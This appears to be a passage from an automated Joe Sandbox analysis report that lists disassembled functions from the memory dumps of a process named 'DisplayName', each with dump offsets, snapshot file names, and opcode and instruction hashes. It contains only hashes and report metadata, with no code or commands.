                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ab073610ebd2073bb54a9b2f85c00b51a6a26aeb73c9bd86d9b6115fa83beb5f
                                      • Instruction ID: 4f3b3f294e060143ff3dd3b7171d7a87fe94d591a9b92c32b2265c33d3fea226
                                      • Opcode Fuzzy Hash: ab073610ebd2073bb54a9b2f85c00b51a6a26aeb73c9bd86d9b6115fa83beb5f
                                      • Instruction Fuzzy Hash: 2421E13A704251AFDB049F69D854AAA7BA7EFC9320F14807AFA09CB351DE318C15C791
                                      Function 057FCA42 Relevance: .1, Instructions: 94COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bebe503948c82ba8cb142878eff2e3d5fd4ccd445bb2e918d328c88bb2924ea2
                                      • Instruction ID: 4c01a934f4caca1da6c515604659bb6e829aab4ef239af0bf1329a6114259fa0
                                      • Opcode Fuzzy Hash: bebe503948c82ba8cb142878eff2e3d5fd4ccd445bb2e918d328c88bb2924ea2
                                      • Instruction Fuzzy Hash: 2631D371A08519DFCB16DF68C884A69FBB5FF40300F41816AD605D7246D730ED86D7A1
                                      Function 057F7961 Relevance: .1, Instructions: 88COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3017ef9edefa09a389973756f124eb0147531e3691bf28e6588cd913c97112ad
                                      • Instruction ID: 18e3e6e8d4fb78cfce7e626b30ef62d308aec1dfdaff63887ab89d9c849e6244
                                      • Opcode Fuzzy Hash: 3017ef9edefa09a389973756f124eb0147531e3691bf28e6588cd913c97112ad
                                      • Instruction Fuzzy Hash: 90316A34700704CFD728EF29D484A6ABBB6FF85311B14852DEA528B360DF35E942CB90
                                      Function 057FCB63 Relevance: .1, Instructions: 86COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 83919c483e60ed512b49af840d05879995a6cdd80de8081e9c3815d310c34c10
                                      • Instruction ID: 92bc79e200745d73c523315605194cdb2dcfffc77197a83025f1b5611cf6b8aa
                                      • Opcode Fuzzy Hash: 83919c483e60ed512b49af840d05879995a6cdd80de8081e9c3815d310c34c10
                                      • Instruction Fuzzy Hash: 43214F35640108DFCF09DFA4D884D59BBBAFF8C320F1540A9EA06AB361DA72DD52DB91
                                      Function 057FE458 Relevance: .1, Instructions: 85COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 568c1d095d1ef9efec788cb507d77b96590769766796e5a8ac2ee58f03276edc
                                      • Instruction ID: 11b461b47d6b3bc1f4a22c47f3074553dcded4549fcd3011dda09a1875ea10d6
                                      • Opcode Fuzzy Hash: 568c1d095d1ef9efec788cb507d77b96590769766796e5a8ac2ee58f03276edc
                                      • Instruction Fuzzy Hash: 8821A4327046008FD774CA69E844A36B7A9FFC0361B15847EE60EC7761DB31E846C751
                                      Function 057FB7D6 Relevance: .1, Instructions: 85COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d9a50e5e4f773fde190e4e888231458fcfc95b703a63e4989bccd225fedadea5
                                      • Instruction ID: 2dbaab8c6c7288b573b32dfbf90de99d737109e7f32357d1c6be21452c49bc8a
                                      • Opcode Fuzzy Hash: d9a50e5e4f773fde190e4e888231458fcfc95b703a63e4989bccd225fedadea5
                                      • Instruction Fuzzy Hash: 73216B35700601CFC714DB28E858A6A77A2FFC82657258569EA5ACB3A1DB35DC03DB90
                                      Function 057F77E0 Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 366074e0370fceee9504fee1ee8f939739da0215a87b45b9fa04489a83ec2576
                                      • Instruction ID: 610f8371410ab9f58765bd3c8c6be1371b32aab791f7d1d8a146300c074b54f3
                                      • Opcode Fuzzy Hash: 366074e0370fceee9504fee1ee8f939739da0215a87b45b9fa04489a83ec2576
                                      • Instruction Fuzzy Hash: EC211B71E042199FEB48DEB4E544BEAB7B5EF44350F108076D616D7240E734EA50EB91
                                      Function 05641E8D Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2789766810.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5640000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 22ecc1057abee769ce1868b955cafcbce316380f4b71e1c07912a81366f357b8
                                      • Instruction ID: 677bd3266420572fcaa6ea243a43ae4dabfec894f765bb3a9af8c42c8625e6cb
                                      • Opcode Fuzzy Hash: 22ecc1057abee769ce1868b955cafcbce316380f4b71e1c07912a81366f357b8
                                      • Instruction Fuzzy Hash: A3312778D04209CFDB15DFA5D8146BEBBB2FB86301F10806AE415A7291D7345A86CF91
                                      Function 009908F9 Relevance: .1, Instructions: 74COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2772830333.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_990000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f9220f6dd70c2cc18e7e77c8bed7da500ee2d1afaa5a841bdf54e8388c7e16f
                                      • Instruction ID: 9ea680c23d347b1f921c1dd19029aa01bc45c35f749bb23178f08c25692319a3
                                      • Opcode Fuzzy Hash: 5f9220f6dd70c2cc18e7e77c8bed7da500ee2d1afaa5a841bdf54e8388c7e16f
                                      • Instruction Fuzzy Hash: B2212774A00518DFDB04EB69C454A9D7BF2BF8D700F204469E406EB3A1DB74AC05CBA1
                                      Function 008BD030 Relevance: .1, Instructions: 74COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2772481196.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_8bd000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 066bf4a49d1d72e67e5ccc307d7480319433ed7e71fbbc8891f7976f65a03fd3
                                      • Instruction ID: 04fa34b3aa9667b96b21690bfb263fe1288c3abc70fb589adea1a520094dcc19
                                      • Opcode Fuzzy Hash: 066bf4a49d1d72e67e5ccc307d7480319433ed7e71fbbc8891f7976f65a03fd3
                                      • Instruction Fuzzy Hash: 3121FFB1504704EFCB10EF14D980B66BFA5FB88314F20C169E9058B356D33AD807CAA2
                                      Function 057F8270 Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f92c907a6cec8b31b41da9fb88cfa9741d01a8cffa0d84e49c0a2cf2d6a7232c
                                      • Instruction ID: ee5237947f480a0e6371851f05b573749acb860e971a1e533d5dbd4b861c5cff
                                      • Opcode Fuzzy Hash: f92c907a6cec8b31b41da9fb88cfa9741d01a8cffa0d84e49c0a2cf2d6a7232c
                                      • Instruction Fuzzy Hash: 6D2135713045489FCB05CF6AC884EAA7BEAFF8E211F0840A5FA05CB361DA31EC41DB61
                                      Function 057F8280 Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 70d72b1452b6882aacc186856551a72ffb5803d538572181e2a27b1bc4f57c0c
                                      • Instruction ID: 018de4635287d2df7e82073c1b4929f3d15d72b73fab7972ac7adefbe1ae3bf2
                                      • Opcode Fuzzy Hash: 70d72b1452b6882aacc186856551a72ffb5803d538572181e2a27b1bc4f57c0c
                                      • Instruction Fuzzy Hash: FD213A703045589FCB05CF6AC844EAA7BEABF8E310B054095F945CB361DA35EC51DB61
                                      Function 057F3B22 Relevance: .1, Instructions: 71COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ed40796cc1939175b8a19bb2a3fe7ffaecaf2dd07e1c3bf223844b5a37119068
                                      • Instruction ID: ec332f41c4ba07b67039f1bc57ae6a3843aec769226d121850e608946c3da8b1
                                      • Opcode Fuzzy Hash: ed40796cc1939175b8a19bb2a3fe7ffaecaf2dd07e1c3bf223844b5a37119068
                                      • Instruction Fuzzy Hash: 33216D35A00209DBDB14DFA9C8589DEBFB6FF8C320F149529E911A7390DF759841CB90
                                      Function 057FB8F8 Relevance: .1, Instructions: 69COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4d09574077f8a3f9d54a13a69f1329cec370539a4dc4c0a0aeba76b69135d018
                                      • Instruction ID: 070bf163110c0d5d872f5a27d4ebb866ab2c4f3cac49623037bed9c0a77775ad
                                      • Opcode Fuzzy Hash: 4d09574077f8a3f9d54a13a69f1329cec370539a4dc4c0a0aeba76b69135d018
                                      • Instruction Fuzzy Hash: 1E21D571A00219CFDB04DFA4C545ADDBBF2FF88301F2041A5E545AB3A1CB75AD41DBA0
                                      Function 05717F40 Relevance: .1, Instructions: 68COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e5a52a70d9d9cce1419c35d43254460c0d1eb3921d223555ece10e1bedb2fddb
                                      • Instruction ID: 441ca527b381a5c5e616309a3d64016b59181fa5f7de217b0f534d4984ac601e
                                      • Opcode Fuzzy Hash: e5a52a70d9d9cce1419c35d43254460c0d1eb3921d223555ece10e1bedb2fddb
                                      • Instruction Fuzzy Hash: 89210AB4E04209DFCB58DFA9C4446AEBBFAFB85300F50C2AAD815A7254D7349983DF94
                                      Function 00990908 Relevance: .1, Instructions: 65COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2772830333.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_990000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: afc619acdbc7df0c12cc09208c4a41cd37fd9dc55ea469a8c44ca6c8c69e8fe4
                                      • Instruction ID: da225017a8246edde0700d2dc40c69268e9aad51a4d7644a4abfa643e1147fa2
                                      • Opcode Fuzzy Hash: afc619acdbc7df0c12cc09208c4a41cd37fd9dc55ea469a8c44ca6c8c69e8fe4
                                      • Instruction Fuzzy Hash: F9213870A00518CFDB44EB69C458A9D7BF6BF8C700F208469E506BB3A1DB74AC45CBA1
                                      Function 057F34A9 Relevance: .1, Instructions: 65COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ba633da6d5fc3b7e415e3f7b74e5f0bbce07975bd891f9f9494e35ebf615e59a
                                      • Instruction ID: e8bc6c748bc5fb3006b154e57cbf128d5036f041f3a07945370f3710f7b77437
                                      • Opcode Fuzzy Hash: ba633da6d5fc3b7e415e3f7b74e5f0bbce07975bd891f9f9494e35ebf615e59a
                                      • Instruction Fuzzy Hash: ED21F370A103098FD744EF79D846BAEBBEAEF88300F40852DE10AD7685DF799D058B90
                                      Function 057FCAA0 Relevance: .1, Instructions: 61COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1fb476976f89a44f2bc9d414ff2e70f805bdc0ff8372f62ca697fbcc7d36ffdb
                                      • Instruction ID: 977b2ecd6aed8d33c833d168e9fb04c434646b36b0ba71f2c45bda220c9b72ad
                                      • Opcode Fuzzy Hash: 1fb476976f89a44f2bc9d414ff2e70f805bdc0ff8372f62ca697fbcc7d36ffdb
                                      • Instruction Fuzzy Hash: BC116BB37082058BDB119A2EEC41B4BEBAEEFD1328F04457AF509C7345E921DD4AC7A0
                                      Function 057F5601 Relevance: .1, Instructions: 60COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 47d06aeb14aeca2ba98c6d3ec824ed3e2ef49a8a1945e9bc7641702e31e2fb0b
                                      • Instruction ID: f2f59a26169370524b8fbb61ee1b8af66341c74fcfd5b79d61297fa61731592d
                                      • Opcode Fuzzy Hash: 47d06aeb14aeca2ba98c6d3ec824ed3e2ef49a8a1945e9bc7641702e31e2fb0b
                                      • Instruction Fuzzy Hash: 0A1158357001059FCB14DF69C895AAEBBB6EF89310F148069EA01EF3A1DB31EC01CBA5
                                      Function 057FCB59 Relevance: .1, Instructions: 57COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b9c7b6ebc894fe8f04497d25234a7772a16972e775072a51911c00b9f8152edb
                                      • Instruction ID: 4c86a5f2ff84b23b5ce46c16dd7dc850dbe31e7eb9b6610898c42034450a140b
                                      • Opcode Fuzzy Hash: b9c7b6ebc894fe8f04497d25234a7772a16972e775072a51911c00b9f8152edb
                                      • Instruction Fuzzy Hash: E711F736644109DFDF0ACFA4D844C59BBBAFF88324B1680E5E60A5B231CA32DD52EB51
                                      Function 00999269 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2772830333.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_990000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 95188e44e5fb596ce34bbba99d9c2def51b1a248638ef209c3f05cfcf44852ad
                                      • Instruction ID: 912d0f407cdf610e744f969762df677cbbec0f5b84df85ed359d5d63d874ae9b
                                      • Opcode Fuzzy Hash: 95188e44e5fb596ce34bbba99d9c2def51b1a248638ef209c3f05cfcf44852ad
                                      • Instruction Fuzzy Hash: 2521AF74915228DBEB28CF69C888BECB7B1BB59301F1096EAD50AA3250DB341EC1CF04
                                      Function 057FB848 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 14697ca7080f554bd167ae9deecd72ce5dcf6a3e911e071487fab0e3a282e12d
                                      • Instruction ID: a1573244c27ff7d315ea0d84c3191cbae2ebe4d7850d8399d544e2d4e908c5f8
                                      • Opcode Fuzzy Hash: 14697ca7080f554bd167ae9deecd72ce5dcf6a3e911e071487fab0e3a282e12d
                                      • Instruction Fuzzy Hash: 46111E35740614DFCB15AB68E418A7E7BA7FBC8662715402AE90ACB360DF35CC02DBD4
                                      Function 057F4649 Relevance: .1, Instructions: 55COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 90303b5af3451bc990130792402efa0dbc5a587d1a20c25e188a7ed3e84a8960
                                      • Instruction ID: 47cac1d7138734c2af18cc97fe9ea86e3e3224a142a8b197100b8dacded744f6
                                      • Opcode Fuzzy Hash: 90303b5af3451bc990130792402efa0dbc5a587d1a20c25e188a7ed3e84a8960
                                      • Instruction Fuzzy Hash: 41216278A42219DFCB04CF98D594EADBBF2BF49300F104199E906AB361CB70AD41DB50
                                      Function 008BD02B Relevance: .1, Instructions: 55COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2772481196.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_8bd000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 809e61d08e22e76ce91cc8820ff4e731af3413e5bb78afaf9674e6f4a3375f10
                                      • Instruction ID: e2c140834c124b597aeaa2c8572c400901cb2092085d92dcf6919ff79ab19374
                                      • Opcode Fuzzy Hash: 809e61d08e22e76ce91cc8820ff4e731af3413e5bb78afaf9674e6f4a3375f10
                                      • Instruction Fuzzy Hash: A111BE76504684DFCB11DF14D9C0B56BF62FB84310F24C2AAD8094B656C33AD81ACBA2
                                      Function 057F48E0 Relevance: .1, Instructions: 52COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 91795b2dfd4d1d9b88dba28641d0607fdaf1d8bc892125d22d7d2e3777b6a9cf
                                      • Instruction ID: 6517dcc0b2a699e76004956338e0bafd0d3dded87adfdb0ab1a2f71667c414a6
                                      • Opcode Fuzzy Hash: 91795b2dfd4d1d9b88dba28641d0607fdaf1d8bc892125d22d7d2e3777b6a9cf
                                      • Instruction Fuzzy Hash: 1A118631B402049FCF20DFB988057BBBBF6AB89741F04402AE645D7380DA71C901DBA0
                                      Function 057F4528 Relevance: .1, Instructions: 51COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6f5568a00a2fdfa3944d8514dd15d661c55a87a11c56e63920f546c5582ac9c1
                                      • Instruction ID: 620c6b8b08101aff6826f76a99610169622a7313b515b49716ed5631dc440973
                                      • Opcode Fuzzy Hash: 6f5568a00a2fdfa3944d8514dd15d661c55a87a11c56e63920f546c5582ac9c1
                                      • Instruction Fuzzy Hash: B4014436340315AFDB10DE59DC85FAB7BAAFB89B21F108066FA15CB390CAB1D910D750
                                      Function 05713121 Relevance: .0, Instructions: 48COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f077114a09566cc0bb816cdcfda8e845765a0d4fc35be860756af691b4b7eae9
                                      • Instruction ID: ca547ba3b01c14e31a0cf7d007cf720c6e2285a85f648785f3b6bf20415d3ec5
                                      • Opcode Fuzzy Hash: f077114a09566cc0bb816cdcfda8e845765a0d4fc35be860756af691b4b7eae9
                                      • Instruction Fuzzy Hash: 98115772904208EFCB54DFA8C9457ADBBF5FB4A300F14C9AAE819D7250D6358B11EF50
                                      Function 057FB842 Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f04ad7576fd9e5900c8132403fd580d230f1396fefb7b8334890f859786f6819
                                      • Instruction ID: 8b8ad5ae0808f1d5b756fbea619742ff1ab2ba64c8a6811a4418ef9c838ddeab
                                      • Opcode Fuzzy Hash: f04ad7576fd9e5900c8132403fd580d230f1396fefb7b8334890f859786f6819
                                      • Instruction Fuzzy Hash: 7A012C35740614DFCB15AB64E418E3977A6FBC86A6B154069ED0ACB360DF35DC02DBD0
                                      Function 05B1F0B8 Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2791083524.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5b00000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1b58a7ca076d024db2e4ec118c6d30729172a9dceee90c475a9932b2303c48d3
                                      • Instruction ID: ce7cac7d0ffe45e4f9f49a702bb8d1f7ada783cac488455768a7a0c3fe38acf5
                                      • Opcode Fuzzy Hash: 1b58a7ca076d024db2e4ec118c6d30729172a9dceee90c475a9932b2303c48d3
                                      • Instruction Fuzzy Hash: 1A11F3B0E002099FDB44DFAAC8457BEBBF5FF89300F10856AD518E7345EA345A018FA5
                                      Function 009997FB Relevance: .0, Instructions: 40COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2772830333.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_990000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 757ccec6006744417f582a5df0f1381f576e169ec35a57a1bdea1cea4a33956f
                                      • Instruction ID: b72b74822619b70df7fc3576bf2ac80f5cbb9e948f398bd21f2a48ebd4282d41
                                      • Opcode Fuzzy Hash: 757ccec6006744417f582a5df0f1381f576e169ec35a57a1bdea1cea4a33956f
                                      • Instruction Fuzzy Hash: 39118B748152288FDF609F28D889798B7F5FB89360F1001EAD90DA2650DB366AD08F05
                                      Function 05717F30 Relevance: .0, Instructions: 40COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a951a576cfcfe21acfdfcf455033b9fd0a30e9a4f862ee2c5436c45ba723c305
                                      • Instruction ID: 05a158460d626bb91bb52f3217446c4b7d19f67f73ed17c417353de6faca0e53
                                      • Opcode Fuzzy Hash: a951a576cfcfe21acfdfcf455033b9fd0a30e9a4f862ee2c5436c45ba723c305
                                      • Instruction Fuzzy Hash: 840140B0D082499FCB58CFB9C8411AEBFFAFB86310F2486AAD454A7251D7304683CB45
                                      Function 057FD6A9 Relevance: .0, Instructions: 39COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 96cf51d04b1565ff062c967586a21cc9afa84510133be265c060db46551d3289
                                      • Instruction ID: a5cff11a783fbd1c0c666af7c6ae970250208b78a6e4909b08721c3d2644097a
                                      • Opcode Fuzzy Hash: 96cf51d04b1565ff062c967586a21cc9afa84510133be265c060db46551d3289
                                      • Instruction Fuzzy Hash: 54F02B367000085BDB149A29D898D6AF7AEEBC8360F048066EE19D7360DE31DC06C790
                                      Function 057176F1 Relevance: .0, Instructions: 39COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3af4b1b65cd3fb9b1a12a623f298fc0e1e2c63ba8d90366e9e97704bc9284f20
                                      • Instruction ID: 82a5afa946298eb80360c8e419c5ab553605a62e725db76e539af8733b995052
                                      • Opcode Fuzzy Hash: 3af4b1b65cd3fb9b1a12a623f298fc0e1e2c63ba8d90366e9e97704bc9284f20
                                      • Instruction Fuzzy Hash: E9015A70C052499FCB44DFB8C8446ADBBF4FB49204F2485EAD809E3241E7324A45CB51
                                      Function 0571F6F8 Relevance: .0, Instructions: 39COMMON
                                      Download Yara Rule
                                      Memory Dump Source
